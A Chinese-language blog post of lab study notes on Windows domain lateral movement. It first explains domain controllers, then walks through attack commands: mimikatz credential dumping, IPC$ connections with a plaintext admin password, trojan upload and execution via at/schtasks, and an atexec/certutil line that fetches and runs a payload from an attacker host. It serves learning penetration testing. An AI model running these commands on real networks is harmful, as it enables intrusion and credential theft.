内网横向笔记
好久没写笔记了,活该我记一点忘一点QAQ,下面是域环境的定义(ai生成例子不太好),还有(横向移动跳过了通过漏洞WebShell上传文件的过程,以及使用cs上传木马的过程),本人写的只是笔记,原理涉及较少本人不是这个专业,emmm可能题目就是思路,剩下就是工具了
实验环境

1.域环境说明
一个例子:云图科技公司
环境概况
- 公司名称:云图科技(Yuntu)
- 域名:
yuntu.local - 域控制器:
DC01.yuntu.local(Windows Server 2022) - 域成员主机:
PC-001(销售部员工张三的电脑)PC-002(财务部员工李四的电脑)FILE-SVR(文件服务器)PRINT-SVR(打印服务器)
员工每天早上到公司,打开电脑登录 yuntu\zhangsan(张三的域账号)。
DC 在域环境中扮演的 6 个核心作用
1. 身份认证中心(你是谁?)
张三在 PC-001 输入密码后,电脑自己不验证密码,而是把密码发送给 DC01.yuntu.local。
DC 检查密码是否正确:
- ✅ 正确 → 返回"登录成功",同时下发一个 Kerberos 票据(TGT) 给张三
- ❌ 错误 → 拒绝登录
没有 DC 会怎样? 张三无法登录任何域内电脑,因为每台电脑都不存储域用户密码。
2. 资源访问授权中心(你能干什么?)
张三想访问文件服务器上的 \\FILE-SVR\Sales(销售部共享文件夹):
- 他的电脑把 Kerberos 票据交给 DC
- DC 验证后判断:张三属于销售部组 → 有读取权限
- DC 告诉文件服务器:"这个用户确实可以访问"
如果李四(财务部)想访问同样的文件夹:
- DC 检查发现李四不在销售部组 → 拒绝授权
没有 DC 会怎样? 每台服务器自己无法知道域内用户的身份和权限,要么全部拒绝,要么全部开放,无法精细控制。
3. 策略强制中心(你的电脑必须听公司的)
IT 管理员在 DC 上创建了一个组策略(GPO):
- 所有电脑的密码必须不少于 8 位
- 屏幕无操作15 分钟后自动锁屏
- 自动映射销售部的网络驱动器
S:到\\FILE-SVR\Sales
PC-001 每隔 90 分钟向 DC 请求:"有没有新策略给我?"
DC 回复:"有,照做。"
电脑自动强制执行。
没有 DC 会怎样? 每台电脑的策略要 IT 人员手动一台台配置,1000 台电脑就需要配置 1000 次,而且员工可以随意改回去。
4. 时间同步中心(全区统一时间)
- DC 作为权威时间源,所有域内主机每 15 分钟自动与 DC 同步时间
PC-001、FILE-SVR、PRINT-SVR时间都完全一致(误差 < 5 分钟)
为什么这么重要?
域内认证依赖 Kerberos 协议,要求客户端和服务器的时间差不能超过 5 分钟,否则登录会直接失败("时钟偏移过大")。
没有 DC 会怎样? 不同电脑时间逐渐漂移,很快超过 5 分钟差异,域登录和资源访问大面积失败。
5. DNS 与名称解析中心(你怎么找到其他人?)
- 域内所有主机向 DC 注册自己的 DNS 记录
- 当张三想访问文件服务器
FILE-SVR时:- 他的电脑向 DC 查询:"
FILE-SVR.yuntu.local的 IP 是多少?" - DC 回复:"
192.168.1.50"
- 他的电脑向 DC 查询:"
- DC 还会发布 SRV 记录(如
_ldap._tcp.yuntu.local),帮助域成员自动找到域控制器
没有 DC 会怎样? 只能用 IP 地址访问服务器,或者手动配置每台电脑的
hosts文件,管理员维护成本极高。
6. 账号与对象存储中心(整个域的户口本)
DC 上运行 Active Directory 数据库,存储整个域的所有对象:
- 用户(张三、李四、管理员……)
- 计算机(PC-001、FILE-SVR……)
- 组(销售部组、财务部组、域管组……)
- 组策略、组织单位(OU)、打印机……
IT 管理员可以在 DC 上直接:
- 创建一个新用户
yuntu\wangwu - 把某台电脑移入某个 OU
- 查看某个用户属于哪些组
没有 DC 会怎样? 没有这个"户口本",就没有域的概念,每台电脑回到工作组状态,各自为政。
一张表总结
| 作用 | 简单理解 | DC 不工作时会发生什么 |
|---|---|---|
| 身份认证 | 验证密码 | 无人能登录域电脑 |
| 资源授权 | 检查你有没有权限访问某个文件/打印机 | 无法访问任何域资源 |
| 策略强制 | 强制所有电脑遵守公司配置 | 每台电脑各自为政,策略不统一 |
| 时间同步 | 统一全区时间 | Kerberos 认证失败,大面积登录不了 |
| DNS 解析 | 让你通过名字找到别人 | 必须记 IP,无法自动发现服务 |
| 对象存储 | 存储所有域用户、电脑、组的信息 | 整个域消失,变成工作组 |
一句话总结
DC 是域环境的"大脑+户口本+时间服务器+DNS服务器+警察局" —— 没有它,域环境不复存在,所有域成员主机退化为独立的工作组电脑。
深入理解:机器属于域还是用户属于域?
直接答案
本台机器属于域,而用户也属于域。两者是独立的域对象,通过"域信任"和"权限映射"关联起来。
更准确地说:
- 机器属于域 → 这台机器信任该域的域控制器进行身份认证
- 用户属于域 → 该用户的账号密码、权限信息存储在域控制器上,而非本地
详细解释
1. 机器加入域意味着什么?
当一台机器(比如 PC-001)"加入域"后:
- 机器本身在 Active Directory 中生成一个计算机对象(Computer Object),类似一个"机器账号"
- 机器会信任该域的域控制器,知道"以后谁登录我,我都去问 DC 认不认"
- 机器的本地 SAM 数据库不再负责域用户的登录验证
可以这样理解:
PC-001 对 DC 说:"DC 老大,从现在起我听你的,你说谁能登录我,我就让谁进。"
2. 用户属于域意味着什么?
当一个域用户(比如 yuntu\zhangsan)存在时:
- 用户账号、密码哈希、所属组、权限等全部存储在域控制器的 Active Directory 数据库中
- 用户可以在任何一台加入该域的主机上登录(除非被明确限制)
- 用户在域内访问资源(文件服务器、打印机等)时,由 DC 统一做权限验证
可以这样理解:
zhangsan 的"身份户口"在 DC 上,而不是在某台电脑的本地账户列表里。
关键区别:登录时的验证流程
| 登录类型 | 谁验证密码? | 依赖什么? |
|---|---|---|
域用户登录(yuntu\zhangsan) |
域控制器(DC) | 机器是域成员 |
本地用户登录(PC-001\Administrator) |
本机 SAM 数据库 | 机器可以是工作组,也可以是域成员 |
例子:
PC-001加入yuntu.local域后,本地仍有.\Administrator这个账号(本地),同时也可以输入yuntu\zhangsan(域账号)登录- 用
yuntu\zhangsan登录时,PC-001会把密码发给 DC 验证 - 用
.\Administrator登录时,PC-001用自己的 SAM 数据库验证,DC 不参与
机器账号本身也是一种"域身份"
- 域内每台机器也有自己的"机器账号",格式为:
计算机名$(比如PC-001$) - 这个账号也有密码(自动管理,120 天自动更换)
- 机器加入域时,就是靠这个机器账号和 DC 建立信任关系
所以:
- 机器账号(
PC-001$)属于域 - 用户账号(
zhangsan)属于域 - 本地账号(
PC-001\Administrator)属于机器本身,与域无关不同的身份登入域环境下的主机,是用户属于域还是本台机器属于域?
答案是:两者都属域,但角色不同。
- 机器属于域 → 它为域用户提供了"登录入口",并信任 DC 做验证
- 用户属于域 → 它的身份是域级别的,可以在任何一台域成员机器上登录
2.内网横向移动
首先判断当前是否为域环境
shell net time /domain

之后进行信息收集
shell ping OWA2010CN-God.god.org -4
得到当前域控的ip地址

执⾏命令收集域内⽤⼾信息:
shell net user /domain

之后进行漏洞提权并提取跳板机上内存中的登录过的账号密码和哈希值,#内⽹域环境,每当域内其他账号登录在这台电脑的时候,登录过程中账号和密码信息会有域环境的验证过程,这个验证过程会将账号密码保存在当前电脑的运⾏内存中,这时可以使⽤mimikatz插件抓取内存中的账号密码
IPC连接实现横向
正向连接:

将cs生成的木马上传到跳板机上
IPC连接:https://blog.csdn.net/flyingleo1981/article/details/18763229
它是指在操作系统中,不同进程之间进⾏数据交换和协同⼯作的⼀种技术,ipc可以通过共享内存、管道、套接字等多种⽅式实现进程间的通信。
常见的 IPC 方式
| 方式 | 特点 | 速度 | 适用范围 |
|---|---|---|---|
| 管道(Pipe) | 单向传输,父子进程间常用 | 较快 | 同机 |
| 命名管道(Named Pipe) | 双向传输,可跨进程 | 较快 | 同机 / 网络(SMB) |
| 共享内存(Shared Memory) | 最快的 IPC,多个进程直接读写同一块内存 | 极快 | 同机 |
| 消息队列(Message Queue) | 异步消息传递 | 快 | 同机 |
| 套接字(Socket) | 最通用,支持网络通信 | 取决于网络 | 同机 / 网络 |
| 信号(Signal) | 异步通知,传输信息量少 | 快 | 同机 |
| DCOM / COM | Windows 特有,组件间通信 | 一般 | 同机 / 网络 |
建立连接 :shell net use \192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator
CS利⽤提权过的system会话,选择⽂件管理将⽣成的4444.exe⽊⻢上传到当前主机上
shell copy 4444.exe \192.168.3.21\c$
查看当前时间:
shell net time
使⽤at命令创建计划任务:(时间需要根据实际情况去设置)
对Windows2012版本之前:shell at \192.168.3.21 12:51 c:\4444.exe
Windows2012及以后:schtasks /create /s 192.168.3.21 /ru "SYSTEM" /tn beacon /sc DAILY /tr
c:\4444.exe /F
shell at \\目标ip检查计划任务是否穿构建成功

反向


同样将其放到跳板机上去
过程同上,只不过访问者变成了DC机器,访问外部命令控制了自身,视角不同笼子内的也可以是外面
impacket套件实现横向
impacket是⼀系列⽹络协议,包括IP、TCP、ICMP等基础的⽹络协议,更重要的是其实现了⼤量的
Windows通信协议,是⼀个常⽤的“域渗透⼯具包”。⼯具包的原始代码都是⽤python写的脚本,在
实战中需要依赖于python的环境,所以有局限性
痕迹当然没有最好了zzz
将⽊⻢放到跳板机iis(一个运行在操作系统上的程序,通过 Socket 绑定一个端口(通常是80或443),然后进入一个无限循环,不断接受网络连接、读取HTTP请求、返回HTTP响应。),apacha等网站根目录下方
执⾏下载命令将⽊⻢下载到dc本地:shell atexec.exe god/administrator:Admin12345@192.168.3.21 "certutil.exe - urlcache -split -f http://192.168.3.31:80/5555.exe fan.exe"
上线脚本shell atexec.exe god/administrator:Admin12345@192.168.3.21 "fan.exe"
还有就是登录域内其他账号也行用smb监听
代理流量转发再转发


PTT票据传递
票据传递(Pass the Ticket,PTT),使⽤ Kerberos票据进⾏内⽹横向,不需要管理员权限。当在域
环境下的⼀些通信协议不能够正常利⽤时。也就是前⾯学习的⽅式都⽆法利⽤,可以尝试利⽤收集到
的凭据信息⽣成票据去拿到域控权限。
⽹络认证协议Kerberos(相当于web中的cookie或session,属于⽤⼾凭据)
•
Kerberos是⼀个⽹络认证协议,⽤于验证⽤⼾和服务之间的⾝份,解决分布式计算环境中的⾝
份验证问题。它使⽤加密技术来提供安全的⾝份验证,并防⽌⽹络中的⾝份欺骗攻击。Kerberos协
议使⽤了票据交换的⽅式,其中包括客⼾端、认证服务器(AS)和票据授予服务器(TGS)
•
Kerberos协议的优势在于提供了安全的⾝份验证机制,防⽌了⽹络中的⾝份欺骗攻击。它使
⽤加密技术、共享密钥和票据交换等⽅法,确保只有经过⾝份验证的⽤⼾才能访问受保护的服务。
Kerberos⼴泛应⽤于企业⽹络环境中,特别是在Windows域环境中,⽤于实现单点登录和统⼀⾝
份验证
内⽹域中基本概念:
KDC(Key Distribution Center)= 密钥分发中⼼
AS(Authentication Service)= 认证⽤⼾的⾝份,并为其发放TGT的服务
TGT(Ticket Granting Ticket)= TGT认证票据,由AS服务发放,存储在内存,默认有效期为10⼩时
TGS(Ticket Granting Service)= 票据发放服务
ST(Service Tickets)= ST服务票据,由TGS服务发送
AP(Application Server)= 提供⽤⼾所需的服务
⻩⾦票据(Golden Ticket)= 使⽤域账号krbtgt的NTLM Hash进⾏加密
⽩银票据 (Silver Ticket)= 使⽤服务账⼾的NTLM Hash进⾏加密
票据攻击的原理及利⽤:https://blog.csdn.net/weixin_54902210/article/details/128240484
emmm其实搜本站更好
剩下的下次一定补
下次是权限维持

浙公网安备 33010602011771号